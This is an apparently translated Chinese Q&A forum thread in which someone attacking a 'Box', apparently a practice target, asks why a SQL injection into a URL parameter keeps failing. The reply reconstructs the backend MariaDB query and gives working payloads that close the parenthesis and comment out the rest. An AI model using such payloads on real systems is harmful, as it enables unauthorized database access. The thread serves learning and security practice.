我试图将SQL语句注入Box中。 我有以下注入点:
example.com/?o=1&page=app
当我注入1'时,我会收到以下错误消息:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
我正在尝试注入以下内容:
1' ORDER BY 1 --
我仍然收到错误消息,并且我不知道如何关闭该语句:
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER BY 1 --') and ( dest like '5' or dest like '1' ORDER BY 1 --') LIMIT 10' at line 1
我做错了什么? 感谢您的回答!
答案 0 :(得分:0)
鉴于您尝试1'时查询中包含'1'',看来原始查询是这样的:
... '5' or dest like '$o') LIMIT 10
例如
SELECT * FROM table WHERE (category = '5' or dest like '$o') LIMIT 10
要使其成为有效查询,您需要关闭括号。
例如%') --,给出:
SELECT * FROM table WHERE (category = '5' or dest like '%') --') LIMIT 10
或%' OR '' = ',给出:
SELECT * FROM table WHERE (category = '5' or dest like '%' OR '' = '') LIMIT 10